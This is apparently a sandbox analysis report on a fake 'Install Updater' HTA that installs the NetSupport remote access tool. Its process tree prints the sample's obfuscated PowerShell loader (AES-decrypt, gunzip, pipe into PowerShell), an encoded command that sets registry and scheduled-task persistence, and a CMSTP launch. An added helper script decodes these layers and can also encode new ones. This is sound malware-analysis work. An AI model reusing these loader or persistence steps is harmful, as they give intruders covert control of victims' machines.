Analysis

  • max time kernel
    141s
  • max time network
    206s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18/07/2023, 03:25

General

  • Target

    Install Updater (V104.551.2)-stable.zip

  • Size

    4.7MB

  • MD5

    fbe7dec7fbb2ab938fb68c68311a4168

  • SHA1

    08326c945c66fc4ed00e818913258905efbe8495

  • SHA256

    ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39

  • SHA512

    ffa6445d59b07ab31c33aaef1befb1a409140f17d7e1931f8247f409a27b5960f34f48a203fc262acd487c4aef9f969f8d5cf0a3dbabf36b8faca362cf78f5f1

  • SSDEEP

    98304:86OGtHcG/ILJjjSQ8ByUBIPoVs+90eNDzumoYQBcnG3:86O4HcuI1jHJwVVCeN/umvQcnE

Score
10/10

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as legitimate system administration software.

  • Blocklisted process makes network request (3 IoCs)
  • Downloads MZ/PE file
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE (1 IoC)
  • Loads dropped DLL (5 IoCs)
  • Drops file in System32 directory (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill (1 IoC)
  • Modifies registry class (7 IoCs)
  • Suspicious behavior: EnumeratesProcesses (54 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of WriteProcessMemory (36 IoCs)

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"
    1⤵
      PID:1112
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1392
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3564
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2944
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded 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
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4784
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3228
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"
                    7⤵
                      PID:2796
                  • C:\Windows\SysWOW64\cmstp.exe
                    "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
                    6⤵
                      PID:2188
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4572
          • C:\Windows\SysWOW64\DllHost.exe
            C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3548
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded UgBFAEcAIABBAGQAZAAgACIASABLAEUAWQBfAEMATABBAFMAUwBFAFMAXwBSAE8ATwBUAFwAQwBMAFMASQBEAFwAewA2ADQANQBGAEYAMAA0ADAALQA1ADAAOAAxAC0AMQAwADEAQgAtADkARgAwADgALQAwADAAQQBBADAAMAAyAEYAOQA1ADQARQB9AFwAcwBoAGUAbABsAFwAbwBwAGUAbgBcAGMAbwBtAG0AYQBuAGQAIgAgAC8AZgAgAC8AdgBlACAALwB0ACAAUgBFAEcAXwBTAFoAIAAvAGQAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACQAQQBjAHQAaQBvAG4AIAA9ACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQApADsAJABUAHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBCAGEAYwBrAGcAcgBvAHUAbgBkAEMAaABlAGMAawAiACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACIASABpAGcAaABlAHMAdAAiACAALQBGAG8AcgBjAGUAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAG8AbgBpAGMAQgBhAHMAZQBiAGEAbgBkAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUA
              2⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4596
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
                3⤵
                • Modifies registry class
                PID:364
              • C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
                "C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of FindShellTrayWindow
                PID:1844
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /IM cmstp.exe /F
              2⤵
              • Kills process with taskkill
              PID:4696
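The cmd.exe / powershell.exe chain at levels 2 to 4 of the tree carries the second stage as a base64 blob ($uGSyEn) that is decrypted with AES-256 in ECB mode using the embedded key ($QcRGrPc), gunzipped and piped into `powershell -`. The script below is an added analyst helper, not code from the report or from the sample: it replays that decryption offline and returns the decoded stage as text instead of executing it, and it also decodes the UTF-16LE `-Encoded` layer used by the DllHost-spawned powershell.exe (whose argument decodes to the reg.exe and Register-ScheduledTask commands shown at the next level of the tree). The key is the one the sample embeds; the ciphertext is redacted in the report, so a constructed blob built with the same scheme is used for the round trip. It assumes Windows PowerShell 5.1 on .NET Framework, the runtime the sample ran under, whose GzipStream tolerates the trailing zero padding that follows the gzip member; other runtimes were not checked here.

```powershell
# Added example (analyst tooling, not from the report or the sample).
$StagerKeyB64 = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ='   # $QcRGrPc, decodes to a 32-byte ASCII key

function New-StagerAes {
    param([string]$Base64Key)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::ECB      # no chaining, so the IV is never used
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::Zeros   # NUL padding, not PKCS#7
    $aes.KeySize = 256
    $aes.Key     = [Convert]::FromBase64String($Base64Key)
    return $aes
}

function ConvertFrom-StagerBlob {
    # Mirrors the sample's $uGSyEn -> $AjSplBV chain: base64 -> AES-256-ECB -> gzip -> UTF-8 text.
    param(
        [Parameter(Mandatory)][string]$Base64Blob,
        [string]$Base64Key = $StagerKeyB64
    )
    $blob = [Convert]::FromBase64String($Base64Blob)
    $aes  = New-StagerAes $Base64Key
    # The sample copies blob[0..15] into .IV, but ECB ignores it: the first 16 bytes
    # are simply a prefix that is skipped, which is why decryption starts at offset 16.
    $plain = $aes.CreateDecryptor().TransformFinalBlock($blob, 16, $blob.Length - 16)
    $aes.Dispose()
    # Zeros padding is not stripped on decrypt, so trailing NULs follow the gzip member.
    $inStream = [System.IO.MemoryStream]::new($plain)
    $gz  = [System.IO.Compression.GzipStream]::new($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    $out = [System.IO.MemoryStream]::new()
    $gz.CopyTo($out); $gz.Close(); $inStream.Close()
    return [System.Text.Encoding]::UTF8.GetString($out.ToArray())
}

function ConvertTo-StagerBlob {
    # Constructed inverse, used only to build test input: gzip -> AES-256-ECB -> 16 filler bytes + ciphertext.
    param([Parameter(Mandatory)][string]$Script, [string]$Base64Key = $StagerKeyB64)
    $ms  = [System.IO.MemoryStream]::new()
    $gz  = [System.IO.Compression.GzipStream]::new($ms, [System.IO.Compression.CompressionMode]::Compress)
    $raw = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $gz.Write($raw, 0, $raw.Length); $gz.Close()
    $gzBytes = $ms.ToArray()
    $aes = New-StagerAes $Base64Key
    $ct  = $aes.CreateEncryptor().TransformFinalBlock($gzBytes, 0, $gzBytes.Length)
    $aes.Dispose()
    $prefix = [byte[]]::new(16)   # content is irrelevant: the decryptor skips it
    return [Convert]::ToBase64String([byte[]]($prefix + $ct))
}

function ConvertFrom-EncodedCommand {
    # For the "-Encoded" layers: powershell.exe expects UTF-16LE text, base64-encoded.
    param([Parameter(Mandatory)][string]$Base64)
    return [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Round trip on a constructed payload (the real $uGSyEn value is redacted in the report):
$demo = ConvertTo-StagerBlob -Script 'Write-Output "constructed stage-2 script"'
ConvertFrom-StagerBlob -Base64Blob $demo
# With the real blob: ConvertFrom-StagerBlob -Base64Blob $uGSyEn | Set-Content -Path stage2.ps1
# With the -Encoded argument from the tree: ConvertFrom-EncodedCommand -Base64 '<value>'
```

Decoding to a file rather than piping into `powershell -` is the whole point: the decoded stage is what contains the download URL behind the "Blocklisted process makes network request" signature, and it is the input to the `-Encoded` layer that compiles a C# helper with csc.exe and drives cmstp.exe.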

          Network

          MITRE ATT&CK Enterprise v6

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            1KB

            MD5

            def65711d78669d7f8e69313be4acf2e

            SHA1

            6522ebf1de09eeb981e270bd95114bc69a49cda6

            SHA256

            aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

            SHA512

            05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Filesize

            53KB

            MD5

            bb7c45699212b8d044800fe3083e69eb

            SHA1

            c7c2f2122674983ae23e51409abe2e4d26ac4823

            SHA256

            960c36ba2442c541fa02f3035ed2e34051d6ffc77c241e719d212e9883efd7cf

            SHA512

            78557adba71183bc3f3f7d7ffbc69de502f19046617c4e8a4390316daf5e4eec4652e22416bd46d2beb20fbf3b7b7cf7ea565ff2fce1d2f5085b8e00766183dd

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            15KB

            MD5

            3fc4824e0a712206096191f319e6d6a9

            SHA1

            b546e0633e242d2bcb287a0d55baffb3d2e07f10

            SHA256

            8c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b

            SHA512

            404c05fb107d25c9834865c377afe079eb0a8180140eb6a78c54e2f87fb776c9602c3bbe3ca39721f943cec68750c53d46732cc019fcee348060f276a221ce49

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            17KB

            MD5

            3111b8507c855bf0afb1b82a6ceb5a3b

            SHA1

            09336fa120984ba60e90b8098780de5bc52edae8

            SHA256

            5b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace

            SHA512

            171fb43f81c1643204d77291e2e02c91a79677d109365a726293d2fd0b63e7de419e484715bbf5992c7c3ce17f45ecb4fd20e3970f283eb2a3301e7a65c00d36

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            19KB

            MD5

            41df442e734dce300c0e13bef9a7da8a

            SHA1

            7593cd0d7c3f4e64d6049faeb04a5475b610a331

            SHA256

            173d3c0fc3c7dc8314848e1cad752e74a3d75089ebd997275cf2237fd6153aa4

            SHA512

            b38f023812a47cf001d07fb33a72ebdf81b697342d31db55d6a9824809779ba099d84a83a7cb140a7db643f4ab7645d151da3fa7e566061ad741b407c7709376

          • C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

            Filesize

            1KB

            MD5

            efb6f1e28f266bb33cb2b76be37cc491

            SHA1

            f4cf1bafdccb11486ff7e5e877246e957cae90db

            SHA256

            d3e346fcadf02b7dcac1f2501434ebca5199be3775fbce22497e08b43ddc14bf

            SHA512

            259b297a8b0739cf6b2b6e7a3f0eba391b99e7346f333ab33b3e67554447609706a3268c34c2e4cabe31d970764d462b1cda25bb7c5416d846dad4092b2d0546

          • C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp

            Filesize

            1KB

            MD5

            e3c3a4cd024da909b42bf03908660705

            SHA1

            adb77c2454224fbbde4c497cbd9b293df83a35f7

            SHA256

            6917fd549295e47b30ee7be69d1c0fe21f01754330844aa0c8402146d7399944

            SHA512

            f665c38caf1059c06938830b393d09d3a0a282b622d2def10278eb78ec023a8831442fb40c122297371f13009447612e2e12a0194075d86cbc1791d7fa6bd0f3

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enzew10p.31g.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.dll

            Filesize

            3KB

            MD5

            66637d2c99c6e40bc6192f1efc4e0f2e

            SHA1

            9347c1d7d9bcaac204ca664577ae6381c1f74100

            SHA256

            64d079edcf82466a380644a127fa159a60c25527140846db5fe11dbf1e9dcd6b

            SHA512

            15b7aed37f2269603a902adcc44a94905d0a7a8d4aec34488527027282f0432095ce3950d2d9b12ebb3485939575ec96138791383ae202e3cae48f29a6850b13

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL

            Filesize

            320KB

            MD5

            2d3b207c8a48148296156e5725426c7f

            SHA1

            ad464eb7cf5c19c8a443ab5b590440b32dbc618f

            SHA256

            edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

            SHA512

            55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\MSVCR100.dll

            Filesize

            755KB

            MD5

            0e37fbfa79d349d672456923ec5fbbe3

            SHA1

            4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

            SHA256

            8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

            SHA512

            2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\NSM.LIC

            Filesize

            257B

            MD5

            7067af414215ee4c50bfcd3ea43c84f0

            SHA1

            c331d410672477844a4ca87f43a14e643c863af9

            SHA256

            2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12

            SHA512

            17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICHEK.DLL

            Filesize

            18KB

            MD5

            a0b9388c5f18e27266a31f8c5765b263

            SHA1

            906f7e94f841d464d4da144f7c858fa2160e36db

            SHA256

            313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

            SHA512

            6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.DLL

            Filesize

            3.6MB

            MD5

            00587238d16012152c2e951a087f2cc9

            SHA1

            c4e27a43075ce993ff6bb033360af386b2fc58ff

            SHA256

            63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

            SHA512

            637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\PCICL32.dll

            Filesize

            3.6MB

            MD5

            00587238d16012152c2e951a087f2cc9

            SHA1

            c4e27a43075ce993ff6bb033360af386b2fc58ff

            SHA256

            63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

            SHA512

            637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe

            Filesize

            103KB

            MD5

            8d9709ff7d9c83bd376e01912c734f0a

            SHA1

            e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294

            SHA256

            49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3

            SHA512

            042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.ini

            Filesize

            677B

            MD5

            c2fcdcd6299b04fbef530d7b144181d8

            SHA1

            43d8a39fb9a78b244b6740ac654be9fe84d32d31

            SHA256

            4536ff38e0ad3191aa7682ae532660f1b51d3d7f8dbcabb90fe9bdfa12eaada5

            SHA512

            4335f0721aeceaf3ce8aa492aea2f66d8dc1930d2963395d7c13768cc0d772d9cf3bdda4e00ad2335d919dfc430022eb64bf6157c2811175844cebf1629917cb

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\msvcr100.dll

            Filesize

            755KB

            MD5

            0e37fbfa79d349d672456923ec5fbbe3

            SHA1

            4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

            SHA256

            8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

            SHA512

            2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\pcicapi.dll

            Filesize

            32KB

            MD5

            dcde2248d19c778a41aa165866dd52d0

            SHA1

            7ec84be84fe23f0b0093b647538737e1f19ebb03

            SHA256

            9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

            SHA512

            c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\pcichek.dll

            Filesize

            18KB

            MD5

            a0b9388c5f18e27266a31f8c5765b263

            SHA1

            906f7e94f841d464d4da144f7c858fa2160e36db

            SHA256

            313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

            SHA512

            6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

          • \??\c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP

            Filesize

            652B

            MD5

            99098e74c736af4c6091d654bf437908

            SHA1

            fbdd75270a2a3199c06d500f375ac8a93d017d61

            SHA256

            736ab241ff665485982d66aca09acba8310e0a802564a4bf1b23b318d641f041

            SHA512

            e853007e310ff3698686283628cb7a04b223468776ab622c0e4ad50e7cc722b7011de5fbd678ce32e356256e495133bcf8261e2807f82ca30e59fcc08d167308

          • \??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.0.cs

            Filesize

            268B

            MD5

            7fbb3f2ac5a0040e7e42f8fc7cd6fbfe

            SHA1

            93fcde99bba753677f8786fbcdba4d695296bd12

            SHA256

            d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2

            SHA512

            3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8

          • \??\c:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline

            Filesize

            369B

            MD5

            29a3f8c092a3b0faa5b6d042e1c978b0

            SHA1

            ed601829698514b97f8d9a4f70ace829f9478fb3

            SHA256

            55333cb538988a084f429900f2168606489020e5821a2ff47b02e18522fddce3

            SHA512

            a948e44aec0a83aadfea494a52710c444b02f607e3238a7415526d000d70392fe91777059f3b94f29ec995b9be44a33158281068985cf0076134a4927c8991fa

          • memory/1368-150-0x0000000005070000-0x0000000005080000-memory.dmp

            Filesize

            64KB

          • memory/1368-137-0x0000000005550000-0x0000000005572000-memory.dmp

            Filesize

            136KB

          • memory/1368-151-0x00000000074F0000-0x0000000007586000-memory.dmp

            Filesize

            600KB

          • memory/1368-149-0x0000000006530000-0x000000000654E000-memory.dmp

            Filesize

            120KB

          • memory/1368-139-0x0000000005EF0000-0x0000000005F56000-memory.dmp

            Filesize

            408KB

          • memory/1368-138-0x0000000005D50000-0x0000000005DB6000-memory.dmp

            Filesize

            408KB

          • memory/1368-134-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/1368-158-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/1368-136-0x00000000056B0000-0x0000000005CD8000-memory.dmp

            Filesize

            6.2MB

          • memory/1368-135-0x0000000005070000-0x0000000005080000-memory.dmp

            Filesize

            64KB

          • memory/1368-133-0x0000000004F30000-0x0000000004F66000-memory.dmp

            Filesize

            216KB

          • memory/1368-152-0x0000000006A30000-0x0000000006A4A000-memory.dmp

            Filesize

            104KB

          • memory/1368-153-0x0000000006A80000-0x0000000006AA2000-memory.dmp

            Filesize

            136KB

          • memory/1368-154-0x0000000007B40000-0x00000000080E4000-memory.dmp

            Filesize

            5.6MB

          • memory/2944-284-0x00000000717D0000-0x0000000071F80000-memory.dmp

            Filesize

            7.7MB

          • memory/2944-207-0x0000000007E00000-0x0000000007E1E000-memory.dmp

            Filesize

            120KB

